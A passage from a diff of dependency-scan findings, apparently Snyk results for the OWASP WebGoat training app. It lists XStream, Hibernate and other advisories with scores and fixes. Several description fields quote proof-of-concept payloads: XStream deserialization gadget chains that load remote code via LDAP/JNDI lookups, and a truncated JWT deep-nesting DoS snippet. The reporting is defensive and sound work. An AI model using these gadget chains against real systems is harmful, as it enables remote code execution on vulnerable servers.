+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H"
+                },
+                {
+                  "assigner": "Red Hat",
+                  "base_score": 8.5,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:53:48.457423Z",
+                  "severity": "high",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H"
+                },
+                {
+                  "assigner": "SUSE",
+                  "base_score": 8.1,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:49:57.11424Z",
+                  "severity": "high",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
+                }
+              ],
+              "cvss_vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H/E:H",
+              "disclosed_at": "2021-08-24T08:17:50Z",
+              "ecosystem": {
+                "language": "java",
+                "package_manager": "maven",
+                "type": "build"
+              },
+              "epss_details": {
+                "model_version": "v2025.03.14",
+                "percentile": "0.99966",
+                "probability": "0.94380"
+              },
+              "exploit_details": {
+                "maturity_levels": [
+                  { "format": "CVSSv3", "level": "high", "type": "secondary" },
+                  { "format": "CVSSv4", "level": "attacked", "type": "primary" }
+                ],
+                "sources": ["CISA", "Nuclei Templates", "Snyk"]
+              },
+              "id": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569183",
+              "initially_fixed_in_versions": ["1.4.18"],
+              "is_fixable": true,
+              "is_malicious": false,
+              "is_social_media_trending": false,
+              "modified_at": "2025-11-19T05:03:23.351851Z",
+              "package_name": "com.thoughtworks.xstream:xstream",
+              "package_version": "",
+              "published_at": "2021-08-24T15:09:24.537044Z",
+              "references": [
+                {
+                  "title": "XStream Advisory",
+                  "url": "https://x-stream.github.io/CVE-2021-39144.html"
+                },
+                {
+                  "title": "XStream Changelog",
+                  "url": "https://x-stream.github.io/changes.html%231.4.18"
+                },
+                {
+                  "title": "CISA - Known Exploited Vulnerabilities",
+                  "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
+                },
+                {
+                  "title": "Nuclei Templates",
+                  "url": "https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-39144.yaml"
+                }
+              ],
+              "severity": "high",
+              "source": "snyk_vuln"
+            },
+            { "id": "CWE-94", "source": "cwe" },
+            { "id": "CVE-2021-39144", "source": "cve" },
+            { "id": "GHSA-j9h8-phrw-h4fh", "source": "ghsa" }
+          ],
+          "rating": { "severity": "high" },
+          "risk": { "risk_score": { "value": 866 } },
+          "title": "Remote Code Execution (RCE)"
         },
-        "id": "0000004f-0000-4000-8000-00000000004f",
+        "id": "00000000-0000-0000-0000-000000000029",
         "links": {},
         "relationships": {
           "fix": {
@@ -16061,7 +5034,7 @@
                       "dependency_path": [
                         {
                           "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
+                          "version": "2025.4-SNAPSHOT"
                         },
                         {
                           "name": "com.thoughtworks.xstream:xstream",
@@ -16074,7 +5047,7 @@
                 },
                 "outcome": "fully_resolved"
               },
-              "id": "0000004f-0000-4000-8000-00000000004f",
+              "id": "00000000-0000-0000-0000-000000000029",
               "type": "fixes"
             }
           }
@@ -16084,13 +5057,13 @@
       {
         "attributes": {
           "cause_of_failure": false,
-          "description": "## Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.\r\n\r\n\r\n### PoC\r\n\r\n```\r\n\u003cjavax.swing.event.EventListenerList serialization='custom'\u003e\r\n  \u003cjavax.swing.event.EventListenerList\u003e\r\n    \u003cdefault\u003e\r\n      \u003clistenerList\u003e\r\n        \u003cjavax.swing.undo.UndoManager\u003e\r\n          \u003chasBeenDone\u003etrue\u003c/hasBeenDone\u003e\r\n          \u003calive\u003etrue\u003c/alive\u003e\r\n          \u003cinProgress\u003etrue\u003c/inProgress\u003e\r\n          \u003cedits\u003e\r\n            \u003ccom.sun.xml.internal.ws.api.message.Packet\u003e\r\n              \u003cmessage class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'\u003e\r\n                \u003cparsedMessage\u003etrue\u003c/parsedMessage\u003e\r\n                \u003csoapVersion\u003eSOAP_11\u003c/soapVersion\u003e\r\n                \u003cbodyParts/\u003e\r\n                \u003csm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'\u003e\r\n                  \u003cattachmentsInitialized\u003efalse\u003c/attachmentsInitialized\u003e\r\n                  \u003cmultiPart class='com.sun.xml.internal.messaging.saaj.packaging.mime.internet.MimePullMultipart'\u003e\r\n                    \u003csoapPart/\u003e\r\n                    \u003cmm\u003e\r\n                      \u003cit class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'\u003e\r\n                        \u003caliases class='com.sun.jndi.ldap.LdapBindingEnumeration'\u003e\r\n                          \u003ccleaned\u003efalse\u003c/cleaned\u003e\r\n                          \u003centries\u003e\r\n                            \u003ccom.sun.jndi.ldap.LdapEntry\u003e\r\n                              \u003cDN\u003ecn=four,cn=three,cn=two,cn=one\u003c/DN\u003e\r\n                              \u003cattributes class='javax.naming.directory.BasicAttributes' serialization='custom'\u003e\r\n                                \u003cjavax.naming.directory.BasicAttribute\u003e\r\n                                  \u003cdefault\u003e\r\n                                    \u003cignoreCase\u003efalse\u003c/ignoreCase\u003e\r\n                                  \u003c/default\u003e\r\n                                  \u003cint\u003e4\u003c/int\u003e\r\n                                  \u003ccom.sun.jndi.ldap.LdapAttribute serialization='custom'\u003e\r\n                                    \u003cjavax.naming.directory.BasicAttribute\u003e\r\n                                      \u003cdefault\u003e\r\n                                        \u003cordered\u003efalse\u003c/ordered\u003e\r\n                                        \u003cattrID\u003eobjectClass\u003c/attrID\u003e\r\n                                      \u003c/default\u003e\r\n                                      \u003cint\u003e1\u003c/int\u003e\r\n                                      \u003cstring\u003ejavanamingreference\u003c/string\u003e\r\n                                    \u003c/javax.naming.directory.BasicAttribute\u003e\r\n                                    \u003ccom.sun.jndi.ldap.LdapAttribute\u003e\r\n                                      \u003cdefault\u003e\r\n                                        \u003crdn class='com.sun.jndi.ldap.LdapName' serialization='custom'\u003e\r\n                                          \u003ccom.sun.jndi.ldap.LdapName\u003e\r\n                                            \u003cstring\u003ecn=four,cn=three,cn=two,cn=one\u003c/string\u003e\r\n                                            \u003cboolean\u003efalse\u003c/boolean\u003e\r\n                                          \u003c/com.sun.jndi.ldap.LdapName\u003e\r\n                                        \u003c/rdn\u003e\r\n                                      \u003c/default\u003e\r\n                                    \u003c/com.sun.jndi.ldap.LdapAttribute\u003e\r\n                                  \u003c/com.sun.jndi.ldap.LdapAttribute\u003e\r\n                                  \u003ccom.sun.jndi.ldap.LdapAttribute serialization='custom'\u003e\r\n                                    \u003cjavax.naming.directory.BasicAttribute\u003e\r\n                                      \u003cdefault\u003e\r\n                                        \u003cordered\u003efalse\u003c/ordered\u003e\r\n                                        \u003cattrID\u003ejavaCodeBase\u003c/attrID\u003e\r\n                                      \u003c/default\u003e\r\n                                      \u003cint\u003e1\u003c/int\u003e\r\n                                      \u003cstring\u003ehttp://127.0.0.1:8080/\u003c/string\u003e\r\n                                    \u003c/javax.naming.directory.BasicAttribute\u003e\r\n                                    \u003ccom.sun.jndi.ldap.LdapAttribute\u003e\r\n                                      \u003cdefault/\u003e\r\n                                    \u003c/com.sun.jndi.ldap.LdapAttribute\u003e\r\n                                  \u003c/com.sun.jndi.ldap.LdapAttribute\u003e\r\n                                  \u003ccom.sun.jndi.ldap.LdapAttribute serialization='custom'\u003e\r\n                                    \u003cjavax.naming.directory.BasicAttribute\u003e\r\n                                      \u003cdefault\u003e\r\n                                        \u003cordered\u003efalse\u003c/ordered\u003e\r\n                                        \u003cattrID\u003ejavaClassName\u003c/attrID\u003e\r\n                                      \u003c/default\u003e\r\n                                      \u003cint\u003e1\u003c/",
+          "description": "## Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability which may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. \r\n\r\n### PoC\r\n```\r\n\u003csorted-set\u003e\r\n  \u003cjavax.naming.ldap.Rdn_-RdnEntry\u003e\r\n    \u003ctype\u003eysomap\u003c/type\u003e\r\n    \u003cvalue class='javax.swing.MultiUIDefaults' serialization='custom'\u003e\r\n      \u003cunserializable-parents/\u003e\r\n      \u003chashtable\u003e\r\n        \u003cdefault\u003e\r\n          \u003cloadFactor\u003e0.75\u003c/loadFactor\u003e\r\n          \u003cthreshold\u003e525\u003c/threshold\u003e\r\n        \u003c/default\u003e\r\n        \u003cint\u003e700\u003c/int\u003e\r\n        \u003cint\u003e0\u003c/int\u003e\r\n      \u003c/hashtable\u003e\r\n      \u003cjavax.swing.UIDefaults\u003e\r\n        \u003cdefault\u003e\r\n          \u003cdefaultLocale\u003ezh_CN\u003c/defaultLocale\u003e\r\n          \u003cresourceCache/\u003e\r\n        \u003c/default\u003e\r\n      \u003c/javax.swing.UIDefaults\u003e\r\n      \u003cjavax.swing.MultiUIDefaults\u003e\r\n        \u003cdefault\u003e\r\n          \u003ctables\u003e\r\n            \u003cjavax.swing.UIDefaults serialization='custom'\u003e\r\n              \u003cunserializable-parents/\u003e\r\n              \u003chashtable\u003e\r\n                \u003cdefault\u003e\r\n                  \u003cloadFactor\u003e0.75\u003c/loadFactor\u003e\r\n                  \u003cthreshold\u003e525\u003c/threshold\u003e\r\n                \u003c/default\u003e\r\n                \u003cint\u003e700\u003c/int\u003e\r\n                \u003cint\u003e1\u003c/int\u003e\r\n                \u003csun.swing.SwingLazyValue\u003e\r\n                  \u003cclassName\u003ejavax.naming.InitialContext\u003c/className\u003e\r\n                  \u003cmethodName\u003edoLookup\u003c/methodName\u003e\r\n                  \u003cargs\u003e\r\n                    \u003carg\u003eldap://localhost:1099/CallRemoteMethod\u003c/arg\u003e\r\n                  \u003c/args\u003e\r\n                \u003c/sun.swing.SwingLazyValue\u003e\r\n              \u003c/hashtable\u003e\r\n              \u003cjavax.swing.UIDefaults\u003e\r\n                \u003cdefault\u003e\r\n                  \u003cdefaultLocale reference='../../../../../../../javax.swing.UIDefaults/default/defaultLocale'/\u003e\r\n                  \u003cresourceCache/\u003e\r\n                \u003c/default\u003e\r\n              \u003c/javax.swing.UIDefaults\u003e\r\n            \u003c/javax.swing.UIDefaults\u003e\r\n          \u003c/tables\u003e\r\n        \u003c/default\u003e\r\n      \u003c/javax.swing.MultiUIDefaults\u003e\r\n    \u003c/value\u003e\r\n  \u003c/javax.naming.ldap.Rdn_-RdnEntry\u003e\r\n  \u003cjavax.naming.ldap.Rdn_-RdnEntry\u003e\r\n    \u003ctype\u003eysomap\u003c/type\u003e\r\n    \u003cvalue class='com.sun.org.apache.xpath.internal.objects.XString'\u003e\r\n      \u003cm__obj class='string'\u003etest\u003c/m__obj\u003e\r\n    \u003c/value\u003e\r\n  \u003c/javax.naming.ldap.Rdn_-RdnEntry\u003e\r\n\u003c/sorted-set\u003e\r\n```\r\n\r\nUsers who follow [the recommendation](https://x-stream.github.io/security.html#workaround) to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n  \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n  \n\n\u003e Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n  \n## Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.16 or highe",
           "evidence": [
             {
               "path": [
                 {
                   "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
+                  "version": "2025.4-SNAPSHOT"
                 },
                 {
                   "name": "com.thoughtworks.xstream:xstream",
@@ -16101,7 +5074,7 @@
             }
           ],
           "finding_type": "sca",
-          "key": "00000050-0000-4000-8000-000000000050",
+          "key": "00000000-0000-0000-0000-000000000030",
           "locations": [
             {
               "package": {
@@ -16112,18 +5085,114 @@
             }
           ],
           "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "high"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 275
-            }
-          },
-          "title": "Arbitrary Code Execution"
+          "problems": [
+            {
+              "affected_hash_ranges": [],
+              "affected_hashes": [],
+              "affected_versions": ["[,1.4.16)"],
+              "created_at": "2021-03-23T13:03:29.960798Z",
+              "credits": ["wh1t3p1g"],
+              "cvss_base_score": 6.1,
+              "cvss_sources": [
+                {
+                  "assigner": "Snyk",
+                  "base_score": 6.1,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-06T13:59:49.067301Z",
+                  "severity": "medium",
+                  "type": "primary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:N/I:H/A:N/E:P"
+                },
+                {
+                  "assigner": "NVD",
+                  "base_score": 9.8,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:48:18.016235Z",
+                  "severity": "critical",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+                },
+                {
+                  "assigner": "Red Hat",
+                  "base_score": 8.1,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:53:55.845185Z",
+                  "severity": "high",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
+                },
+                {
+                  "assigner": "SUSE",
+                  "base_score": 8.1,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:49:08.223471Z",
+                  "severity": "high",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
+                }
+              ],
+              "cvss_vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:N/I:H/A:N/E:P",
+              "disclosed_at": "2021-03-23T13:02:09Z",
+              "ecosystem": {
+                "language": "java",
+                "package_manager": "maven",
+                "type": "build"
+              },
+              "epss_details": {
+                "model_version": "v2025.03.14",
+                "percentile": "0.87885",
+                "probability": "0.03973"
+              },
+              "exploit_details": {
+                "maturity_levels": [
+                  {
+                    "format": "CVSSv3",
+                    "level": "proof of concept",
+                    "type": "secondary"
+                  },
+                  {
+                    "format": "CVSSv4",
+                    "level": "proof of concept",
+                    "type": "primary"
+                  }
+                ],
+                "sources": ["Snyk"]
+              },
+              "id": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088334",
+              "initially_fixed_in_versions": ["1.4.16"],
+              "is_fixable": true,
+              "is_malicious": false,
+              "is_social_media_trending": false,
+              "modified_at": "2024-03-11T09:53:55.845185Z",
+              "package_name": "com.thoughtworks.xstream:xstream",
+              "package_version": "",
+              "published_at": "2021-03-23T17:13:22.50249Z",
+              "references": [
+                {
+                  "title": "XStream Advisory",
+                  "url": "https://x-stream.github.io/CVE-2021-21346.html"
+                },
+                {
+                  "title": "XStream Changelog",
+                  "url": "http://x-stream.github.io/changes.html%231.4.16"
+                },
+                {
+                  "title": "XStream Workaround",
+                  "url": "https://x-stream.github.io/security.html%23workaround"
+                }
+              ],
+              "severity": "medium",
+              "source": "snyk_vuln"
+            },
+            { "id": "CWE-502", "source": "cwe" },
+            { "id": "CVE-2021-21346", "source": "cve" },
+            { "id": "GHSA-4hrm-m67v-5cxr", "source": "ghsa" }
+          ],
+          "rating": { "severity": "medium" },
+          "risk": { "risk_score": { "value": 164 } },
+          "title": "Deserialization of Untrusted Data"
         },
-        "id": "00000050-0000-4000-8000-000000000050",
+        "id": "00000000-0000-0000-0000-000000000030",
         "links": {},
         "relationships": {
           "fix": {
@@ -16137,11 +5206,11 @@
                       "dependency_path": [
                         {
                           "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
+                          "version": "2025.4-SNAPSHOT"
                         },
                         {
                           "name": "com.thoughtworks.xstream:xstream",
-                          "version": "1.4.18"
+                          "version": "1.4.16"
                         }
                       ],
                       "is_drop": false
@@ -16150,64 +5219,216 @@
                 },
                 "outcome": "fully_resolved"
               },
-              "id": "00000050-0000-4000-8000-000000000050",
-              "type": "fixes"
+              "id": "00000000-0000-0000-0000-000000000030",
+              "type": "fixes"
+            }
+          }
+        },
+        "type": "findings"
+      },
+      {
+        "attributes": {
+          "cause_of_failure": false,
+          "description": "LGPL-2.1 license",
+          "evidence": [
+            {
+              "path": [
+                {
+                  "name": "org.owasp.webgoat:webgoat",
+                  "version": "2025.4-SNAPSHOT"
+                },
+                {
+                  "name": "org.springframework.boot:spring-boot-starter-data-jpa",
+                  "version": "3.5.6"
+                },
+                {
+                  "name": "org.hibernate.orm:hibernate-core",
+                  "version": "6.6.29.Final"
+                }
+              ],
+              "source": "dependency_path"
+            }
+          ],
+          "finding_type": "sca",
+          "key": "00000000-0000-0000-0000-000000000031",
+          "locations": [
+            {
+              "package": {
+                "name": "org.hibernate.orm:hibernate-core",
+                "version": "6.6.29.Final"
+              },
+              "type": "package"
             }
-          }
+          ],
+          "policy_modifications": [],
+          "problems": [
+            {
+              "affected_hash_ranges": [],
+              "affected_hashes": [],
+              "affected_versions": ["[6.0.0.Alpha1, 7.0.0.Beta5)"],
+              "created_at": "2025-03-29T14:42:52.934Z",
+              "ecosystem": {
+                "language": "java",
+                "package_manager": "maven",
+                "type": "build"
+              },
+              "id": "snyk:lic:maven:org.hibernate.orm:hibernate-core:LGPL-2.1",
+              "instructions": [],
+              "license": "LGPL-2.1",
+              "package_name": "org.hibernate.orm:hibernate-core",
+              "package_version": "",
+              "published_at": "2025-03-29T14:42:52.934Z",
+              "severity": "medium",
+              "source": "snyk_license"
+            }
+          ],
+          "rating": { "severity": "medium" },
+          "risk": {},
+          "title": "LGPL-2.1 license"
         },
+        "id": "00000000-0000-0000-0000-000000000031",
+        "links": {},
+        "relationships": {},
         "type": "findings"
       },
       {
         "attributes": {
           "cause_of_failure": false,
-          "description": "## Overview\n[org.jruby:jruby-stdlib](https://www.jruby.org/) is a JRuby Lib Setup package.\n\nAffected versions of this package are vulnerable to Memory Allocation with Excessive Size Value in the `ResponseReader` class. An attacker can cause the application to allocate excessive memory and trigger a denial of service by including \"literal\" strings in responses sent to client-initiated connections and IMAP commands. \r\n\r\nAfter implementing the fix, the default `max_response_size` is still high (512MiB) to accommodate backward compatibility. It is recommended to set a lower `max_response_size` if connecting to untrusted servers or using insecure connections.\n## Remediation\nA fix was pushed into the `master` branch but not yet published.\n## References\n- [GitHub Commit](https://github.com/ruby/net-imap/pull/444/commits/0ae8576c1a90bcd9573f81bdad4b4b824642d105#diff-53721cb4d9c3fb86b95cc8476ca2df90968ad8c481645220c607034399151462)\n- [GitHub PR](https://github.com/ruby/net-imap/pull/442)\n- [GitHub PR](https://github.com/ruby/net-imap/pull/445)\n- [GitHub PR](https://github.com/ruby/net-imap/pull/446)\n- [GitHub PR](https://github.com/ruby/net-imap/pull/447)\n- [Red Hat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2362749)\n",
+          "description": "## Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). When a certain denyTypes workaround is not used, mishandles attempts to create an instance of the primitive type 'void' during unmarshalling, leading to a remote application crash, as demonstrated by an `xstream.fromXML(\"\u0026lt;void/\u003e\")` call.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example,  [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.10 or higher.\n## References\n- [GitHub Commit](https://github.com/x-stream/xstream/commit/6e546ec366419158b1e393211be6d78ab9604ab)\n- [GitHub Commit](https://github.com/x-stream/xstream/commit/8542d02d9ac5d384c85f4b33d6c1888c53bd55d)\n- [GitHub Commit](https://github.com/x-stream/xstream/commit/b3570be2f39234e61f99f9a20640756ea71b1b4)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-7957)\n- [Vendor Advisory](http://x-stream.github.io/CVE-2017-7957.html)\n",
           "evidence": [
             {
               "path": [
                 {
                   "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
-                },
-                {
-                  "name": "org.asciidoctor:asciidoctorj",
-                  "version": "2.5.10"
-                },
-                {
-                  "name": "org.jruby:jruby",
-                  "version": "9.4.3.0"
+                  "version": "2025.4-SNAPSHOT"
                 },
                 {
-                  "name": "org.jruby:jruby-stdlib",
-                  "version": "9.4.3.0"
+                  "name": "com.thoughtworks.xstream:xstream",
+                  "version": "1.4.5"
                 }
               ],
               "source": "dependency_path"
             }
           ],
           "finding_type": "sca",
-          "key": "00000051-0000-4000-8000-000000000051",
+          "key": "00000000-0000-0000-0000-000000000032",
           "locations": [
             {
               "package": {
-                "name": "org.jruby:jruby-stdlib",
-                "version": "9.4.3.0"
+                "name": "com.thoughtworks.xstream:xstream",
+                "version": "1.4.5"
               },
               "type": "package"
             }
           ],
           "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "high"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 84
-            }
-          },
-          "title": "Memory Allocation with Excessive Size Value"
+          "problems": [
+            {
+              "affected_hash_ranges": [],
+              "affected_hashes": [],
+              "affected_versions": ["[,1.4.10)"],
+              "created_at": "2017-05-17T12:10:22.458Z",
+              "credits": ["Unknown"],
+              "cvss_base_score": 7.5,
+              "cvss_sources": [
+                {
+                  "assigner": "Snyk",
+                  "base_score": 7.5,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-06T13:57:39.786417Z",
+                  "severity": "high",
+                  "type": "primary",
+                  "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
+                },
+                {
+                  "assigner": "NVD",
+                  "base_score": 7.5,
+                  "cvss_version": "3.1",
+                  "modified_at": "2025-05-24T01:13:46.291382Z",
+                  "severity": "high",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
+                },
+                {
+                  "assigner": "Red Hat",
+                  "base_score": 5.9,
+                  "cvss_version": "3.0",
+                  "modified_at": "2024-03-11T09:48:23.349842Z",
+                  "severity": "medium",
+                  "type": "secondary",
+                  "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
+                }
+              ],
+              "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
+              "disclosed_at": "2017-04-29T19:59:00Z",
+              "ecosystem": {
+                "language": "java",
+                "package_manager": "maven",
+                "type": "build"
+              },
+              "epss_details": {
+                "model_version": "v2025.03.14",
+                "percentile": "0.85902",
+                "probability": "0.02946"
+              },
+              "exploit_details": {
+                "maturity_levels": [
+                  {
+                    "format": "CVSSv3",
+                    "level": "not defined",
+                    "type": "secondary"
+                  },
+                  {
+                    "format": "CVSSv4",
+                    "level": "not defined",
+                    "type": "primary"
+                  }
+                ],
+                "sources": []
+              },
+              "id": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-31394",
+              "initially_fixed_in_versions": ["1.4.10"],
+              "is_fixable": true,
+              "is_malicious": false,
+              "is_social_media_trending": false,
+              "modified_at": "2025-05-24T01:13:46.291382Z",
+              "package_name": "com.thoughtworks.xstream:xstream",
+              "package_version": "",
+              "published_at": "2017-05-21T07:52:36Z",
+              "references": [
+                {
+                  "title": "GitHub Commit",
+                  "url": "https://github.com/x-stream/xstream/commit/6e546ec366419158b1e393211be6d78ab9604ab"
+                },
+                {
+                  "title": "GitHub Commit",
+                  "url": "https://github.com/x-stream/xstream/commit/8542d02d9ac5d384c85f4b33d6c1888c53bd55d"
+                },
+                {
+                  "title": "GitHub Commit",
+                  "url": "https://github.com/x-stream/xstream/commit/b3570be2f39234e61f99f9a20640756ea71b1b4"
+                },
+                {
+                  "title": "NVD",
+                  "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-7957"
+                },
+                {
+                  "title": "Vendor Advisory",
+                  "url": "http://x-stream.github.io/CVE-2017-7957.html"
+                }
+              ],
+              "severity": "high",
+              "source": "snyk_vuln"
+            },
+            { "id": "CWE-20", "source": "cwe" },
+            { "id": "GHSA-7hwc-46rm-65jh", "source": "ghsa" },
+            { "id": "CVE-2017-7957", "source": "cve" }
+          ],
+          "rating": { "severity": "high" },
+          "risk": { "risk_score": { "value": 139 } },
+          "title": "Denial of Service (DoS)"
         },
-        "id": "00000051-0000-4000-8000-000000000051",
+        "id": "00000000-0000-0000-0000-000000000032",
         "links": {},
         "relationships": {
           "fix": {
@@ -16215,25 +5436,17 @@
               "attributes": {
                 "action": {
                   "format": "upgrade_package_advice",
-                  "package_name": "org.jruby:jruby-stdlib",
+                  "package_name": "com.thoughtworks.xstream:xstream",
                   "upgrade_paths": [
                     {
                       "dependency_path": [
                         {
                           "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
-                        },
-                        {
-                          "name": "org.asciidoctor:asciidoctorj",
-                          "version": "3.0.1"
-                        },
-                        {
-                          "name": "org.jruby:jruby",
-                          "version": "9.4.14.0"
+                          "version": "2025.4-SNAPSHOT"
                         },
                         {
-                          "name": "org.jruby:jruby-stdlib",
-                          "version": "9.4.14.0"
+                          "name": "com.thoughtworks.xstream:xstream",
+                          "version": "1.4.10"
                         }
                       ],
                       "is_drop": false
@@ -16242,7 +5455,7 @@
                 },
                 "outcome": "fully_resolved"
               },
-              "id": "00000051-0000-4000-8000-000000000051",
+              "id": "00000000-0000-0000-0000-000000000032",
               "type": "fixes"
             }
           }
@@ -16252,54 +5465,146 @@
       {
         "attributes": {
           "cause_of_failure": false,
-          "description": "## Overview\n[com.nimbusds:nimbus-jose-jwt](https://connect2id.com/products/nimbus-jose-jwt) is a library for JSON Web Tokens (JWT)\n\nAffected versions of this package are vulnerable to Uncontrolled Recursion due to the improper handling JWT claim sets containing deeply nested JSON objects. An attacker can cause application downtime or resource exhaustion by submitting a specially crafted JWT with excessive nesting.\r\n\r\n**Note:**\r\n\r\nThis issue only affects `nimbus-jose-jwt`, not `Gson` because the Connect2id product could have checked the JSON object nesting depth, regardless of what limits (if any) were imposed by Gson.\n## PoC\n```java\r\nimport com.nimbusds.jwt.JWTClaimsSet;\r\nimport java.text.ParseException;\r\nimport java.util.HashMap;\r\nimport java.util.Map;\r\n\r\npublic class Test {\r\n    // This builds a claimset with a deeply nested map, which could theoretically be supplied by a client.\r\n    // If the JWT is serialized into JSON (for example, in logging or debugging), it can cause a StackOverflowError.\r\n    public static void main(String[] args) throws ParseException {        \r\n        Map\u003cString, Object\u003e nestedMap = new HashMap\u003c\u003e();\r\n        Map\u003cString, Object\u003e currentLevel = nestedMap;\r\n\r\n        for (int i = 0; i \u003c 5000; i++) {\r\n            Map\u003cString, Object\u003e nextLevel = new HashMap\u003c\u003e();\r\n            currentLevel.put(\"\", nextLevel);\r\n            currentLevel = nextLevel;\r\n        }\r\n\r\n        JWTClaimsSet claimSet = JWTClaimsSet.parse(nestedMap);\r\n\r\n        // This will 